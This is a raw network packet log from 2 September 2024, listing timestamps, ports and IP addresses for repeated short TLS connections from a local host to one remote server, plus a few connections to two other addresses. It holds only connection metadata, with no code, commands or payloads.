Sep 2, 2024 16:51:24.916866064 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.916877985 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:25.163310051 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:25.163379908 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:25.163652897 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:25.163877964 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:25.164227009 CEST	443	56236	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:25.164294958 CEST	443	56236	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:25.164359093 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:25.164601088 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.174213886 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.174254894 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.174312115 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.174591064 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.174604893 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.212858915 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.212893009 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.215221882 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.216931105 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.216947079 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.764143944 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.765578032 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.765603065 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.818619013 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:26.819945097 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:26.819977999 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:27.008651972 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:27.008721113 CEST	443	56239	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:27.008769989 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:27.009134054 CEST	56239	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:27.088252068 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:27.088315964 CEST	443	56240	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:27.088383913 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:27.088721991 CEST	56240	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.010608912 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.010649920 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.010736942 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.011040926 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.011059046 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.104268074 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.104329109 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.104607105 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.104917049 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.104940891 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.616264105 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.620670080 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.620716095 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.699883938 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.701149940 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.701169014 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.872277975 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.872405052 CEST	443	56241	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.872486115 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.889262915 CEST	56241	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.947221041 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.947302103 CEST	443	56242	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:28.947381020 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:28.954271078 CEST	56242	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.902880907 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.902924061 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:29.902988911 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.903302908 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.903316975 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:29.964070082 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.964123964 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:29.964240074 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.964515924 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:29.964526892 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.506189108 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.508608103 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:30.508629084 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.554585934 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.555629015 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:30.555666924 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.754674911 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.754757881 CEST	443	56243	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.754843950 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:30.755217075 CEST	56243	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:30.839931011 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.840007067 CEST	443	56244	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:30.840059042 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:30.840472937 CEST	56244	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.770137072 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.770179987 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:31.770241976 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.774470091 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.774493933 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:31.866858959 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.866902113 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:31.867084980 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.867274046 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:31.867289066 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.364028931 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.365314960 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:32.365345001 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.484087944 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.485392094 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:32.485421896 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.612535954 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.612620115 CEST	443	56245	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.612670898 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:32.613003016 CEST	56245	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:32.782416105 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.782486916 CEST	443	56246	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:32.782582045 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:32.782990932 CEST	56246	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.636912107 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.636950970 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:33.637036085 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.637403965 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.637417078 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:33.791861057 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.791870117 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:33.791948080 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.792193890 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:33.792206049 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.264631033 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.264734983 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.265727997 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:35.265743971 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.265887976 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:35.265898943 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.510917902 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.511013031 CEST	443	56248	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.511071920 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:35.511909008 CEST	56248	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:35.514249086 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.514324903 CEST	443	56247	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:35.514368057 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:35.514724970 CEST	56247	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527128935 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527177095 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:36.527189970 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527199984 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:36.527319908 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527404070 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527637959 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.527661085 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:36.528006077 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:36.528014898 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.157655001 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.160795927 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:37.160820961 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.167728901 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.169220924 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:37.169244051 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.403049946 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.403142929 CEST	443	56250	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.403223991 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:37.420363903 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.420427084 CEST	443	56249	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:37.420535088 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:37.435411930 CEST	56250	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:37.436079025 CEST	56249	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.449618101 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.449682951 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:38.449819088 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.450113058 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.450128078 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:38.453455925 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.453493118 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:38.453551054 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.453809977 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:38.453824043 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.048628092 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.049765110 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.050012112 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:39.050038099 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.050671101 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:39.050689936 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.297435999 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.297522068 CEST	443	56251	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.297570944 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:39.297926903 CEST	56251	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:39.303242922 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.303306103 CEST	443	56252	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:39.303354025 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:39.303642035 CEST	56252	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.310403109 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.310450077 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.310537100 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.314142942 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.314161062 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.317836046 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.317848921 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.317929029 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.318113089 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.318125010 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.905811071 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.906964064 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.906994104 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.923919916 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:40.924818039 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:40.924829006 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:41.151324034 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:41.151388884 CEST	443	56253	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:41.151459932 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:41.151829004 CEST	56253	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:41.187606096 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:41.187674999 CEST	443	56254	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:41.187736988 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:41.190253973 CEST	56254	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.166836977 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.166886091 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.166960955 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.167186022 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.167201996 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.198406935 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.198451042 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.198573112 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.199086905 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.199099064 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.779505968 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.780569077 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.780594110 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.798120975 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:42.799201012 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:42.799228907 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:43.028053999 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:43.028137922 CEST	443	56255	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:43.028219938 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:43.043405056 CEST	56255	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:43.043749094 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:43.043819904 CEST	443	56256	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:43.043869972 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:43.044118881 CEST	56256	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.057560921 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.057622910 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.057816982 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.058067083 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.058074951 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.058161974 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.058377981 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.058388948 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.058796883 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.058804989 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.664535046 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.665916920 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.666321039 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.666341066 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:44.667004108 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:44.667016029 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:45.112535954 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:45.112591982 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:45.112621069 CEST	443	56258	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:45.112663031 CEST	443	56257	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:45.112682104 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:45.112715006 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:45.113075018 CEST	56257	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:45.113365889 CEST	56258	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.229909897 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.229960918 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.230045080 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.230367899 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.230381012 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.230753899 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.230798960 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.230849981 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.231008053 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.231019020 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.825381994 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.827117920 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.827152014 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.842349052 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:46.844515085 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:46.844538927 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:47.073529005 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:47.073610067 CEST	443	56259	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:47.073839903 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:47.074110031 CEST	56259	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:47.091185093 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:47.091253996 CEST	443	56260	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:47.096366882 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:47.096776962 CEST	56260	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.088704109 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.088774920 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.088992119 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.089292049 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.089307070 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.106416941 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.106426954 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.106523991 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.106786966 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.106797934 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.706482887 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.708539009 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.708569050 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.721910000 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.731010914 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.731028080 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.958055019 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.958131075 CEST	443	56261	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.958214998 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.959240913 CEST	56261	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.971374035 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.971451998 CEST	443	56262	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:48.971513987 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:48.975378036 CEST	56262	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.515211105 CEST	56263	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:49.520282030 CEST	80	56263	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:49.520365953 CEST	56263	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:49.520622969 CEST	56263	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:49.525465012 CEST	80	56263	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:49.963727951 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.963768959 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:49.963952065 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.964159012 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.964169979 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:49.979162931 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.979197025 CEST	443	56265	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:49.979266882 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.979473114 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:49.979480028 CEST	443	56265	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:50.187808990 CEST	80	56263	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:50.197112083 CEST	80	56263	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:50.197180986 CEST	56263	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:50.763561010 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:50.763609886 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:50.763683081 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:50.766243935 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:50.766261101 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:50.887317896 CEST	443	56265	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:50.887403965 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:50.888540030 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:50.888564110 CEST	443	56265	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:50.888597965 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:50.888628006 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:51.163671017 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:51.163749933 CEST	443	56264	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:51.164258957 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:51.164711952 CEST	56264	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:51.164803982 CEST	443	56265	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:51.164868116 CEST	443	56265	149.154.167.220	192.168.2.5
